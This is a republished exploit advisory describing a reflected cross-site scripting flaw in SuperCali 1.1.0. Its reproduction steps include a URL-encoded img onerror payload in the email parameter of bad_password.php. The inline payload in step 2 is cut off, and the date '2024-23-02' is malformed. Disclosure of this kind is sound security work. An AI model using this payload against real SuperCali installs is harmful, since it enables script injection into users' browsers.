Exploit/Advisories no image

Published on February 24th, 2024 📆 | 3166 Views ⚑

0

SuperCali 1.1.0 Cross Site Scripting – Torchsec


iSpeech.org

SuperCali 1.1.0 Cross Site Scripting
Posted Feb 24, 2024
Authored by tmrswrr

SuperCali version 1.1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 9f0cd74fe8260d16546ba65db15a5a931753546b0b6b4a4d0d6641c9eee1e37a
# Exploit Title: SuperCali Version : 1.1.0 - Reflected XSS
# Date: 2024-23-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://supercali.inforest.com
# Version : 1.1.0
# Tested on: https://softaculous.com/demos/supercali

1 ) Go to admin login url : https://127.0.0.1/SuperCali/login.php
2 ) Write your payload admin place : ">
3 ) AFter click login will you see alert button : https://127.0.0.1/SuperCali/bad_password.php?email=\%22%3E%3Cimg%20src=x%20onerrora=confirm()%20onerror=confirm(1)%3E&return_to=127.0.0.1/&o=4&c=1&m=02&a=22&y=2024&w=1





Source link

Tagged with:



Comments are closed.